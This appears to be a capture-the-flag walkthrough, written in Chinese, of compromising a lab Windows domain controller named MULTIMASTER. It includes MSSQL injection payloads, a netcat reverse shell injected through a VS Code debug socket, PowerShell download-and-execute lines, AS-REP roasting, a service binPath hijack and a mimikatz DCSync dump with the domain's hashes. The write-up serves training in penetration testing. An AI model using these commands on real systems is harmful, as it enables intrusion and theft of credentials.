Recon & Enum
export IP=10.10.10.179
Recon
- Nmap - Tcp
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: MegaCorp
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-30 01:11:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-01-30T01:12:41+00:00; +7m01s from scanner time.
| rdp-ntlm-info:
| Target_Name: MEGACORP
| NetBIOS_Domain_Name: MEGACORP
| NetBIOS_Computer_Name: MULTIMASTER
| DNS_Domain_Name: MEGACORP.LOCAL
| DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
| DNS_Tree_Name: MEGACORP.LOCAL
| Product_Version: 10.0.14393
|_ System_Time: 2024-01-30T01:12:01+00:00
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Not valid before: 2024-01-29T01:05:39
|_Not valid after: 2024-07-30T01:05:39
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h43m00s, deviation: 3h34m40s, median: 6m59s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: MULTIMASTER
| NetBIOS computer name: MULTIMASTER\x00
| Domain name: MEGACORP.LOCAL
| Forest name: MEGACORP.LOCAL
| FQDN: MULTIMASTER.MEGACORP.LOCAL
|_ System time: 2024-01-29T17:12:02-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-30T01:12:04
|_ start_date: 2024-01-30T01:05:48
- 发现域名
export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL
SMB
- crackmapexec
crackmapexec smb $IP -u guest -p '' --shares
crackmapexec smb $IP -u guest -p '' --rid-brute 10000
LDAP
- ldapsearch
ldapsearch -x -H "ldap://$IP" -s base namingContexts
---
dn:
namingContexts: DC=MEGACORP,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGACORP,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL
ldapsearch -x -H "ldap://$IP" -b "DC=MEGACORP,DC=LOCAL"
---
None
RPC
- Enum4Linux
Domain Name: MEGACORP
Domain Sid: S-1-5-21-3167813660-1240564177-918740779
Web

- Web Scan
feroxbuster -u http://megacorp.local/ -d 1 -C 403
---
- 发现用户

sbauer
okent
ckane
kpage
shayna
james
cyork
rmartin
zac
jorden
alyx
ilee
nbourne
zpowers
aldom
minato
egre55
- Kerbrute 枚举,均为域用户

Shell as User - tushikikatomo
MSSQL 注入
https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/MSSQL%20Injection/
- 测试注入,输入单引号会返回 403

- 尝试编码,成功报错

- 尝试闭合
' or '1'='1,可以看到语句执行成功

- 枚举字段数
aaa' union select 1,2,3,4,5 -- -

- 枚举数据库
aaa' union select 1,@@VERSION,USER_NAME(),DB_NAME(),name FROM master..sysdatabases-- -

Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)
Aug 22 2017 17:04:49
Copyright (C) 2017 Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build 14393: ) (Hypervisor)
User: finder
Hub_DB
master
model
msdb
tempdb
- 枚举表
aaa' union select 1,DB_NAME(),table_name,4,5 from information_schema.tables-- -

Colleagues
Logins
- 枚举字段
aaa' union select 1,name,3,4,5 from syscolumns where id=(select id from sysobjects where name = 'Logins')-- -

- Dump 数据
aaa' union select id,username,password,4,5 from Hub_DB..Logins-- -

9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc
cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc
- Hash 识别发现,可能是 SHA-384 或者 Keccak-384,分别尝试后,正确编码应该是 Keccak-384

- Hashcat 爆破

- 密码喷射
crackmapexec smb $IP -u user.list -p pass.list --continue-on-success

全部失败
MSSQL 枚举域用户
https://stackoverflow.com/questions/703019/convert-integer-to-hex-and-hex-to-integer
- 可以通过
SUSER_SID()来某个域用户的 SIDaaa' union select 1,master.dbo.fn_varbintohexstr(suser_sid('MEGACORP\rmartin')),3,4,5-- -其中域用户名可以通过在查询中进行 hex 编码绕过

得到与用户 MEGACORP\rmartin 的 SID 为: 0x0105000000000005150000001c00d1bcd181f1492bdfc236240c0000 其中后 8 个字节为用户 RID
0x0105000000000005150000001c00d1bcd181f1492bdfc236240c0000
0x0105000000000005150000001c00d1bcd181f1492bdfc236
b'240c0000' - 0x0c24
- 一般 Administrator 的 RID 为
500 - 0x000001f4 - b'f4010000', 尝试获取 Administrator 用户名aaa' union select 1,suser_sname(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000),3,4,5-- -

- 枚举 rid,500 - 10000
from pwn import p32
for i in range(500, 10000):
print(p32(i).hex())

Administrator
Guest
krbtgt
DefaultAccount
Domain Admins
Domain Users
Domain Guests
Domain Computers
Domain Controllers
Cert Publishers
Schema Admins
Enterprise Admins
Group Policy Creator Owners
Read-only Domain Controllers
Cloneable Domain Controllers
Key Admins
Enterprise Key Admins
RAS and IAS Servers
DnsAdmins
DnsUpdateProxy
svc-nas
Privileged IT Accounts
tushikikatomo
- 使用 kerbrute 去掉用户组

发现了两个新用户,再次尝试喷射密码
crackmapexec smb $IP -u user.list -p pass.list --continue-on-success

export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL USER1=tushikikatomo PASS1=finance1
- 登录成功

- 查询域用户

Administrator
alyx
cyork
Guest
jorden
krbtgt
okent
sbauer
tushikikatomo
aldom
andrew
dai
ilee
jsmmons
lana
pmartin
svc-nas
zac
alice
ckane
DefaultAccount
james
kpage
nbourne
rmartin
svc-sql
zpowers
- 再次喷射密码,未发现新的凭据
Bloodhound
Invoke-WebRequest -Uri http://10.10.16.12/SharpHound.exe -O sharphound.exe
./sharphound.exe -c all

PEAS
Invoke-WebRequest -Uri http://10.10.16.12/winPEASx64.exe -O winpeas.exe # 杀软会杀掉
IEX(New-Object Net.WebClient).DownloadString("http://10.10.16.12/winPEAS.ps1")
没啥发现
Shell as User - cyork
- 发现一些主机程序


Visual Studio Code 是基于 Electron 构建的,如果开启了 debug 模式,在某些场景下,让受害者点击链接,即可反弹 Shell
- cefdebug.exe
Invoke-WebRequest -Uri http://10.10.16.12/cefdebug.exe -O cefdebug.exe
./cefdebug.exe

- 向 ws 发送命令查看是否能够执行
./cefdebug.exe --url ws://127.0.0.1:47333/62f3e47e-aef0-4bec-904e-de5ea7763c39 --code "process.mainModule.require('child_process').exec('whoami > c:\\programdata\\whoami.txt')"
type c:/programdata/whoami.txt

- 反弹 Shell
./cefdebug.exe # 使用 nc.exe 反弹,其他的都失败了。而且要选一个其他用户可以访问的目录
./cefdebug.exe --url ws://127.0.0.1:59355/8529154c-317e-43fa-adf8-bb4226d6c617 --code "process.mainModule.require('child_process').exec('\\\\10.10.16.12\\good\\nc.exe 10.10.16.12 2233 -e powershell')"

- cyork 属于开发者用户组,尝试查找敏感文件

- 发现 wwwroot 目录下有很多 dll 文件,开发者很有可能在测试期间把敏感信息加入调试,Multi master API 这个名字比较有趣

Shell as User -sbauer
- windows 多为 16-bit 编码,因此使用 strings 查看字符串,发现数据库的凭据
strings -e {b,l} MultimasterAPI.dll
---
...
HERE
NFORMATION_SCHEMA
ASTER
"info" : "MegaCorp API" }
pplication/json
erver=localhost;database=Hub_DB;uid=finder;password=D3veL0pM3nT!;
elect * from Colleagues where name like '%{0}%'
osition
mail
mage
VS_VERSION_INFO
...
finder:D3veL0pM3nT!
- 另外通过 cyork 查看域用户

- 全部添加到字典中,再次尝试密码喷洒,发现新的用户凭据

export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL USER1=tushikikatomo PASS1=finance1 USER2=sbauer PASS2=D3veL0pM3nT!
- 登录成功

- 查看权限,发现对 jorden 有 GenericWrite 权限,即可以更新 jorden 的属性

- 使 jorden 开启 “不需要预身份验证选项”,以此来进行 Kerberoasting 攻击
Get-ADUser Jorden | Set-ADAccountControl -doesnotrequirepreauth $true
Kerberoasting
impacket-GetNPUsers -dc-ip $IP -no-pass MEGACORP/jorden

Shell as User - jorden
- Hashcat
hashcat -m 18200 hash.list /usr/share/wordlists/rockyou.txt
---
$krb5asrep$23$jorden@MEGACORP:ce43857f47757defd140d7b62af56ff7$eec30c21fa6e6e88829aa1b9f145bc940fc3fbe7d68e8d53fe04bbfa6f212b8135becd6051616e42e6c73d9fb435207d28238ea96c9439c183cd84f40b8ae4c4d5c309f1fa7b07e187341cd6655a8814e730b687c482ddc6d1cc5c94acbdc676ae8a1b1373a58b6aac2f636bd05bd6492816f3482b3c803bbc9b2490a1cab893d12b261dcbc75262757c0fa02b240473b2336186acba925e2ec88de7878ce70cbab3bbbcb6976b7c8e9496a091d3c02cbc32d08a2053cb0dfe2913295a9e47308e9b5578632731fb91f5f5707497cf33eb6e146b522b143cddd86bb9a17b614b371f0f910e32cc2a1fb2:rainforest786
- 登录成功
export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL USER1=tushikikatomo PASS1=finance1 USER2=sbauer PASS2=D3veL0pM3nT! USER3=jorden PASS3=rainforest786

可以看到 jorden 具有 SeBackupPrivilege 权限,可以使用卷影备份,但是更快的方式应该是服务劫持
Shell as Root
- 使用 reg 查询服务
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"

找到一个不会影响系统的服务
- 修改服务配置
sc.exe config browser binPath= "C:\Users\jorden\Documents\nc.exe -e powershell 10.10.16.12 2233"
sc create browser binPath= "C:\Users\jorden\Documents\nc.exe -e powershell 10.10.16.12 2233"
sc.exe stop browser
sc.exe config SamSs binPath= "C:\Users\jorden\Documents\nc.exe -e powershell 10.10.16.12 2233"
sc.exe start browser

Dump Hash
./mimikatz.exe "lsadump::dcsync /domain:megacorp.local /all /csv" exit
---
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:megacorp.local /all /csv
[DC] 'megacorp.local' will be the domain
[DC] 'MULTIMASTER.MEGACORP.LOCAL' will be the DC server
[DC] Exporting domain 'megacorp.local'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 06e3ae564999dbad74e576cdf0f717d3 514
2101 dai cb8a655c8bc531dd01a5359b40b20e7b 66048
2102 svc-sql 3a36abdc15d86766d4cd243d8557e10d 66048
1103 svc-nas fe90dcf97ce6511a65151881708d6027 66048
1601 alice 19b44ab9ec562fe20b35ddb7c6fc0689 66048
1112 lana 3c3c292710286a539bbec397d15b4680 66048
1111 andrew 9e63ebcb217bf3c6b27056fdcb6150f7 66048
3114 zpowers b7c7e43caa54942a2e85d9c8b4074f04 66048
3104 ckane b7c7e43caa54942a2e85d9c8b4074f04 66048
3112 ilee b7c7e43caa54942a2e85d9c8b4074f04 66048
3103 okent b7c7e43caa54942a2e85d9c8b4074f04 66048
3113 nbourne b7c7e43caa54942a2e85d9c8b4074f04 66048
3116 jsmmons b7c7e43caa54942a2e85d9c8b4074f04 66048
3106 james b7c7e43caa54942a2e85d9c8b4074f04 66048
3109 zac b7c7e43caa54942a2e85d9c8b4074f04 66048
3108 rmartin b7c7e43caa54942a2e85d9c8b4074f04 66048
3117 pmartin b7c7e43caa54942a2e85d9c8b4074f04 66048
3105 kpage b7c7e43caa54942a2e85d9c8b4074f04 66048
3111 alyx b7c7e43caa54942a2e85d9c8b4074f04 66048
3115 aldom b7c7e43caa54942a2e85d9c8b4074f04 66048
500 Administrator 69cbf4a9b7415c9e1caf93d51d971be0 66048
1000 MULTIMASTER$ 8563c4d2e37052edb6edeb1332ac7a94 532480
3107 cyork 06327297532725a64e1edec0aad81cfe 66048
1110 tushikikatomo 1c9c8bfd28d000e8904f23c280b25d21 66048
3102 sbauer 050ba67142895b5844a24d5ce9644702 66048
3110 jorden 90960176fcbfe36b4a69fafb3cc0b716 4260352
mimikatz(commandline) # exit
Bye!
